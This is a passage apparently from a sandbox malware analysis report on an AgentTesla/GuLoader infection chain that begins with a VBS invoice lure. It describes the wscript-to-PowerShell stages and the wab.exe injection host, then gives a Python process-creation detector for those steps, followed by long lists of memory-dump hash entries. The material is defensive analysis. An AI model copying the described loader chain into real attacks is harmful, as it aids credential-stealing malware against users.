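The process list above is the whole chain: wscript.exe runs the VBS, which starts a 64-bit powershell.exe with a multi-kilobyte command line; that stage resolves `%appdata%` through `cmd.exe /c "echo %appdata%\Merogastrula.Bes && echo $"`, relaunches itself as 32-bit PowerShell from SysWOW64, and starts the Windows Mail binary wab.exe with no arguments as the host for the AgentTesla payload; newfile.exe in AppData\Roaming carries the same MD5 as wab.exe, so it is a copy of that system binary rather than a new dropper. The block below is an added example written for this page, not a Joe Sandbox, Sigma or vendor rule: process-creation checks that fire on each of those steps, run over records constructed from the Target entries (pid = Target ID, paths and MD5 as listed). The parent links are an assumption from start order and bitness, since the list does not print parent IDs; the PowerShell command line is a stand-in padded to a realistic length; conhost and rundll32 are omitted.

```python
import re
from dataclasses import dataclass

# Added example (written for this page; not a Joe Sandbox, Sigma or vendor
# rule): process-creation checks that would fire on the chain in this
# report, run over records constructed from the Target entries above.

@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    md5: str = ""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
LONG_CMDLINE = 1000                     # chars; the report flags a "very long command line"
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
ECHO_APPDATA = re.compile(r'/c\s+"?echo\s+%appdata%', re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(procs):
    """Return (pid, rule) pairs for every record that trips a check."""
    by_pid = {p.pid: p for p in procs}
    # Hashes of binaries that ran from a trusted directory; the same hash under
    # a user profile means a system binary was copied there (newfile.exe is a
    # byte-identical copy of wab.exe in this report).
    trusted_md5 = {p.md5 for p in procs if p.md5 and p.image.lower().startswith(TRUSTED_DIRS)}
    hits = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""
        if pname in SCRIPT_HOSTS and name in SHELLS:
            hits.append((p.pid, "script_host_spawns_shell"))
        if len(p.cmdline) >= LONG_CMDLINE:
            hits.append((p.pid, "very_long_cmdline"))
        if pname == "powershell.exe" and name == "cmd.exe" and ECHO_APPDATA.search(p.cmdline):
            hits.append((p.pid, "powershell_resolves_appdata_via_cmd"))
        # A program from a trusted directory started by PowerShell with no
        # arguments at all: the usual injection host (wab.exe here).
        if (pname == "powershell.exe" and name not in SHELLS
                and p.image.lower().startswith(TRUSTED_DIRS)
                and p.cmdline.strip().strip('"').lower() == p.image.lower()):
            hits.append((p.pid, "argless_host_from_powershell"))
        if p.md5 and p.md5 in trusted_md5 and "\\appdata\\" in p.image.lower():
            hits.append((p.pid, "system_binary_copied_to_appdata"))
    return hits

# Stand-in for the report's multi-kilobyte PowerShell command line: its real
# opening tokens, padded with a repeated tail so the length is realistic
# (used for both PowerShell records; the SysWOW64 one really has its own path).
PS_CMDLINE = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
              '"$Enchodontoid = 1;$Multinervate=\'Substrin\';$Multinervate+=\'g\';'
              + "Saprophagan $Superincumbent163;" * 80 + '"')

# Records built from the report's Target entries (pid = Target ID, MD5 and
# paths as listed).  The ppid links are an assumption from start order and
# bitness, since the list does not print parent IDs; conhost and rundll32
# are omitted.
REPORT_PROCS = [
    Proc(0, -1, r"C:\Windows\System32\wscript.exe",
         r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"',
         "A47CBE969EA935BDD3AB568BB126BC80"),
    Proc(2, 0, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         PS_CMDLINE, "04029E121A0CFA5991749937DD22A1D9"),
    Proc(4, 2, r"C:\Windows\System32\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"',
         "8A2122E8162DBEF04694B9C3E0B6CDEE"),
    Proc(5, 2, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         PS_CMDLINE, "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"),
    Proc(10, 5, r"C:\Program Files (x86)\Windows Mail\wab.exe",
         r'"C:\Program Files (x86)\windows mail\wab.exe"',
         "251E51E2FEDCE8BB82763D39D631EF89"),
    Proc(12, 10, r"C:\Users\user\AppData\Roaming\newfile\newfile.exe",
         r'"C:\Users\user\AppData\Roaming\newfile\newfile.exe"',
         "251E51E2FEDCE8BB82763D39D631EF89"),
]

if __name__ == "__main__":
    for pid, rule in detect(REPORT_PROCS):
        print(f"Target {pid:>2}: {rule}")
```

The hash check is the one worth keeping beyond this sample: an AgentTesla/GuLoader persistence copy of a clean host binary has a 0% AV detection rate (as the newfile.exe entry shows), so path-plus-hash correlation catches what signatures cannot.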

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7aa4bdaa5a37261fb9020faa86aadebdde099e599575892d16d23ed79d31cfc
                                                                        • Instruction ID: dc7a8a0fde6535c0c2cb1d77830a09e0a503c27d6cbcb70955e816cadcec505c
                                                                        • Opcode Fuzzy Hash: a7aa4bdaa5a37261fb9020faa86aadebdde099e599575892d16d23ed79d31cfc
                                                                        • Instruction Fuzzy Hash: F2D16030A18E4D8FEBA8DF28C8957E977D1FF59301F04426EE84DC7295DB78A9409B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0813d58996f42e40d61e6291f4a288962193e0b5c56af4f59f3bfbc3d5a925f5
                                                                        • Instruction ID: e8ec119709e94efb03ab5ae42cd5f065ab33731e8b7f6db414779da80ed71276
                                                                        • Opcode Fuzzy Hash: 0813d58996f42e40d61e6291f4a288962193e0b5c56af4f59f3bfbc3d5a925f5
                                                                        • Instruction Fuzzy Hash: F0D15130A18E4D8FEBA8DF28C8A57E977D1FB59301F14422ED80DC7295DF79A9408B81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e18438908527ae49dd7cda33280d24f3d3ee70fd88d714fc98c2ebabb3fce85b
                                                                        • Instruction ID: a41a5178d8b2e58156c71b296f5c393993f9d00d79552921b5f1092b75d9a115
                                                                        • Opcode Fuzzy Hash: e18438908527ae49dd7cda33280d24f3d3ee70fd88d714fc98c2ebabb3fce85b
                                                                        • Instruction Fuzzy Hash: FC812970B1CE494FD798EB5CC4E4AB5BBE1EFA6350B14057DD08AC3296DA26F842C780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2931046775.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a90bf195f33d516c1bb234de15521fbb8b42f41c1044b19880ba930024726ad9
                                                                        • Instruction ID: f68b616151d03e395560d0a7432b5c6cf0d501c9eef1177e8322ea9d00301b59
                                                                        • Opcode Fuzzy Hash: a90bf195f33d516c1bb234de15521fbb8b42f41c1044b19880ba930024726ad9
                                                                        • Instruction Fuzzy Hash: F621F632B0DA898FD795DB9C94A49A477E2FF95224B5800B9D51CC7297DD3DEC409700
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2931046775.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8090dba469f49ae0c00bc482fe6031c8904e2fa1af7f4f43f4af7cc5a9a4d6c5
                                                                        • Instruction ID: 1d15f86307dbebfd5933645cb6829cc6978f11f44647d6e2878c2d9082e56a70
                                                                        • Opcode Fuzzy Hash: 8090dba469f49ae0c00bc482fe6031c8904e2fa1af7f4f43f4af7cc5a9a4d6c5
                                                                        • Instruction Fuzzy Hash: 58112322F1EAA90FE3E1A2A838B51B466D0EF5667575801FBE90CD728BEC1C6C005391
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction ID: 241876a0f25de1cf04efdc636e1e615018bbc16f719980464517d69e48099cc2
                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction Fuzzy Hash: 8A01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a933ad23de1c5f3502867c5593b2a17054fbe343f20093dbf9d11327de6c371
                                                                        • Instruction ID: 3291214c3851b1f6680951af86fe27d94ed28f4e3aa57bfa3298da53eda6b8c5
                                                                        • Opcode Fuzzy Hash: 5a933ad23de1c5f3502867c5593b2a17054fbe343f20093dbf9d11327de6c371
                                                                        • Instruction Fuzzy Hash: AD220636B0CA5A4FDB54EBACD4B15E97BE0FF96325B080177D148CB193DE38A8468790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 82dba53a83b5208049d0a10a3eb56f982521b5ef8d3a5dca6493d5de5ad3285f
                                                                        • Instruction ID: 208f5925459445bf4ade34c1b03bd7cfb696fd94714b8b75a8345c8e9576e4fa
                                                                        • Opcode Fuzzy Hash: 82dba53a83b5208049d0a10a3eb56f982521b5ef8d3a5dca6493d5de5ad3285f
                                                                        • Instruction Fuzzy Hash: B202F531B0CA8A8FEB55DF5CC4B59ED7FE0FF56314F1401BAD549E71A2DA28A8428780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21a83fd1924ccb6d8f1fae3517f02c302f133b331bfa7f29862ffb5789e0e5bf
                                                                        • Instruction ID: d7202e157242f5091c0540b419951942e6125382c5329aeda167f6881eb26117
                                                                        • Opcode Fuzzy Hash: 21a83fd1924ccb6d8f1fae3517f02c302f133b331bfa7f29862ffb5789e0e5bf
                                                                        • Instruction Fuzzy Hash: 89D1D362B0DBC25FE7569B2C58F60E67FE0EF5326470900BBC5C5DB0A3D91C684A9352
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16ee434a24a17c22abe8707df60cbb46b9513bd370d49d690bd269d87057747d
                                                                        • Instruction ID: b4535009f2f4958130004da6a532337f97d7f1119cda0a732c6e47984e77cb87
                                                                        • Opcode Fuzzy Hash: 16ee434a24a17c22abe8707df60cbb46b9513bd370d49d690bd269d87057747d
                                                                        • Instruction Fuzzy Hash: 1EC19547B4DAD21BE722577C58F60EA2FA0DF5327470911F7C7D8DA4A3AD0C6807A292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2929461368.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f1ad8977e5663633238bda7991d6b62a6e086782e3c5f42f3adb1eed6b9df9a
                                                                        • Instruction ID: 123e8c9e4096e718840f8f74caa5a830c429c316d735b365b7e484ce5e9abb2f
                                                                        • Opcode Fuzzy Hash: 7f1ad8977e5663633238bda7991d6b62a6e086782e3c5f42f3adb1eed6b9df9a
                                                                        • Instruction Fuzzy Hash: 5F311E4BB4EAD21FE662573D58BA0DA2F90CF9327570901F7CBD4CA4B39D0C1847A292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b50867442927e7bda4448a82521cf00e23334f350d3a4b676b67c72e76635317
                                                                        • Instruction ID: 5d8ffa0975902e90290f941aab06098791fb52f988a1b78c2e740c52f66be848
                                                                        • Opcode Fuzzy Hash: b50867442927e7bda4448a82521cf00e23334f350d3a4b676b67c72e76635317
                                                                        • Instruction Fuzzy Hash: B9B16E70E00209CFDF14CFA9D8857AEBBF2BF88314F148529D816A7254EB74A842CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e5ca986ad8716ac36b651d63cb86c1023ca4b8b2bcc6b1d59001382c9d1e6f5
                                                                        • Instruction ID: cff731dd4f0ec28d6eeb77f0bc0f347bd5cebdb8da1150e099bed33246eff993
                                                                        • Opcode Fuzzy Hash: 2e5ca986ad8716ac36b651d63cb86c1023ca4b8b2bcc6b1d59001382c9d1e6f5
                                                                        • Instruction Fuzzy Hash: 92B17071E00209CFDB14CFA9E89179DBBF2BF88314F148529D816E7294EB74A842CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38556162ff9307b42843690cee411fd40eba5f8f08be931f9498186fabad7219
                                                                        • Instruction ID: 08108db24fb6ddeb592781bc22207e65bb5289bc4d67fa9b8f5c45f6e2a84b4f
                                                                        • Opcode Fuzzy Hash: 38556162ff9307b42843690cee411fd40eba5f8f08be931f9498186fabad7219
                                                                        • Instruction Fuzzy Hash: BA6271B0A00215CFDB24DB68C854BAAFBB2AF85754F14C06AD549AF745CB71EC81CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ef1735750fc930b46acb47239f83cf84bdc3b03019d53a4fff61bccaaef92b0
                                                                        • Instruction ID: e1bbeb83722fddd9bb036d3ad0fbde91f5771811589f8ef881c49464fd43ddf1
                                                                        • Opcode Fuzzy Hash: 5ef1735750fc930b46acb47239f83cf84bdc3b03019d53a4fff61bccaaef92b0
                                                                        • Instruction Fuzzy Hash: D8625CB4B00205DFDB54CB98C544EAAFBB2AF85314F24C069E906AF755CB72EC45CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0ad10901b0856fb214905d21f14a1af0514e2a9ddd817a761d6d9e90bfe6912
                                                                        • Instruction ID: 0ecc6873827851f2f5932194eaf4e06dbb81a0fab213ea30fd22494fd8e0992e
                                                                        • Opcode Fuzzy Hash: b0ad10901b0856fb214905d21f14a1af0514e2a9ddd817a761d6d9e90bfe6912
                                                                        • Instruction Fuzzy Hash: 2A6241B4A00219DFDB54DB64C854BEEBBB2AF84704F1080E9D9096B781CB75EE81CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9462e7e697c52d19a1f2f1b1433f527e49090d26180030ba738dc723c44fd5e4
                                                                        • Instruction ID: 8c776a39580d55408fbca551a8d1463a865b676f33559ee473464fba44b7ef46
                                                                        • Opcode Fuzzy Hash: 9462e7e697c52d19a1f2f1b1433f527e49090d26180030ba738dc723c44fd5e4
                                                                        • Instruction Fuzzy Hash: B2323AB4A00205DFDB54CB98C944EA9FBB2AF89714F25C069E80AAF355CB72EC45CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44e16f97f39ca28bef3055a1b952d9c6c911a552c576491b38acc333fe65ca31
                                                                        • Instruction ID: b665e4850740519dcd005ba1d2a5998f9456cd6dba1e074de048bdb7ccf0ba42
                                                                        • Opcode Fuzzy Hash: 44e16f97f39ca28bef3055a1b952d9c6c911a552c576491b38acc333fe65ca31
                                                                        • Instruction Fuzzy Hash: 7712D3B1B00206DFDB14CBA8C454AAAFBF2AFC5714F14806AD945AF395DB71DC41CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43953186e2ce33b9e23abbd70859b8bafff498cc8339109f770326a765123d0c
                                                                        • Instruction ID: 45e23c456ffbf85eab1e2f38e34a2721e286da8adcf09f5e8816c1720f96c09a
                                                                        • Opcode Fuzzy Hash: 43953186e2ce33b9e23abbd70859b8bafff498cc8339109f770326a765123d0c
                                                                        • Instruction Fuzzy Hash: 4E226230B011648FDB29DF64D854AAEB7B2FF89304F1480A9D54AAB351DF35AD82CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Opcode Fuzzy Hash: 287c131829faf72408a1e63785d976177fb79e0133cae4cd2d1c3c280ba7734f
                                                                        • Instruction Fuzzy Hash: 54413C70A00218DFDB18DFA9C894A9DBBF2FF84344F54842DD406AB790DBB4AC45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29614cc71cafa82a650175c1146c1cbb37470349e236fa4952656c602b2794aa
                                                                        • Instruction ID: fff9f0188ea501fccd73ee6be7fbd52d8cf770bf38a51846ca001aebff042497
                                                                        • Opcode Fuzzy Hash: 29614cc71cafa82a650175c1146c1cbb37470349e236fa4952656c602b2794aa
                                                                        • Instruction Fuzzy Hash: 5A3185B4B00214DBEB049768C814BAE7BA3AFC5754F10C029E9016F791CF72EC428B96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 360c6b5ac15032a10818c147e4b452739f5201eb1ef520980dd896e4af1191c9
                                                                        • Instruction ID: 9951e28394fe53c04fd3794452fb865857e990d5374458f316d0ae6d20a59f8c
                                                                        • Opcode Fuzzy Hash: 360c6b5ac15032a10818c147e4b452739f5201eb1ef520980dd896e4af1191c9
                                                                        • Instruction Fuzzy Hash: 0131F4F1B05206EFDB205A75880077AFBA1AF81A50F5800AAD845DF286EA35CD45CBB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1dad724fe10e5dd328e21d551ac23d6a7e4fc1279b71fec178e82a8be57c5589
                                                                        • Instruction ID: 7421a8c97ea83707f49584d06f21c6369429f4ed2baef5027a2401f8b21fd2fe
                                                                        • Opcode Fuzzy Hash: 1dad724fe10e5dd328e21d551ac23d6a7e4fc1279b71fec178e82a8be57c5589
                                                                        • Instruction Fuzzy Hash: C7313F30B01158CFCB25DB64C8546EEB7B2AF49304F1144E9D94AAB351DF35AE86CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e46b5cd744fdfacd4436a1fe2ca4ba79aa012e583818c4090660d6e0adbd1aee
                                                                        • Instruction ID: 4dfe7f9378fe2641bdd03834c7f39103c8d545161c8404252280927330387064
                                                                        • Opcode Fuzzy Hash: e46b5cd744fdfacd4436a1fe2ca4ba79aa012e583818c4090660d6e0adbd1aee
                                                                        • Instruction Fuzzy Hash: A531FCF5A04206DFEB204E65C5447BAFBAAEFC4350F19806AD84887156C735DD80C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7d993d26e66a1582513cc6d35e8ab3682fd851d58dbd660bf8813c107a66fa7
                                                                        • Instruction ID: bcf00ac6646eb657c998912bec5d7dbcc98a9c1f84310a5121d3f425ba7d3917
                                                                        • Opcode Fuzzy Hash: a7d993d26e66a1582513cc6d35e8ab3682fd851d58dbd660bf8813c107a66fa7
                                                                        • Instruction Fuzzy Hash: F031E475A006099FCB14CF5CC5809AEBBF1FB49310B258699E959AB755C732FC81CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12919e6fe424ce1f946a1ccaa548c93c671fe11f681f6529499fd2e9b0a45fcc
                                                                        • Instruction ID: fe040bf43075ff67310e0c01f28cf9bf766f6336034f1abb8640e56da7301446
                                                                        • Opcode Fuzzy Hash: 12919e6fe424ce1f946a1ccaa548c93c671fe11f681f6529499fd2e9b0a45fcc
                                                                        • Instruction Fuzzy Hash: 47118EB53093869FD7128BA49850961FF75AFC2254F1A809BD5848F293E732DC05CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f1e3025cc0e252dd090cfd8ad19029add8238eec50122ca32d7c214db4c17cc
                                                                        • Instruction ID: ef88ce0dcfdc78eff924e660c7b8556972b911dc57cd98fed57cf8b842594904
                                                                        • Opcode Fuzzy Hash: 6f1e3025cc0e252dd090cfd8ad19029add8238eec50122ca32d7c214db4c17cc
                                                                        • Instruction Fuzzy Hash: 98213A74A042199FCB00CF98C4809AABBB5FB89310B14819AD915EB352C635FD42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587204651.0000000004DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DCD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4dcd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d7e4f6734f8f4dd9aa7e76a14636350c2afa3e62620155959d810bc11c4c4f7
